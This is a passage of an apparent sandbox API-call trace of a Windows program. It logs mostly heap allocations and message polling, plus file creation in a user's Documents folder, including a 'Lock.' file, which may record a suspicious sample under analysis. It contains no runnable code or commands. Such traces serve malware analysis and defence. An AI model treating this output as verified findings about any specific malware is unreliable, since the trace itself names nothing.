hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0260.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0260.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.380] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.380] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.380] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.380] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/52zSkSwJyavPCLOxO1y" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\52zskswjyavpcloxo1y"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0260.381] GetLastError () returned 0x5 [0260.381] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.381] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.381] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0260.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0260.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.52zSkSwJyavPCLOxO1y" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.52zskswjyavpcloxo1y"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0260.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0260.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0260.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0260.385] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0260.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0260.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.385] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0260.385] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.385] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0260.385] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.385] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.385] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.386] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.386] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.386] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.386] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.386] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0260.386] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.387] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0260.387] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.387] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0260.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0260.387] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.387] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0260.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.387] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.387] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.387] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.388] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.388] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.388] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0260.388] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.388] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0260.388] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.388] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.389] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.389] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.389] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0260.389] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0260.389] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.389] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0260.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0260.389] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.390] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0260.390] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.390] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.390] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0260.390] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0260.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0260.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.391] 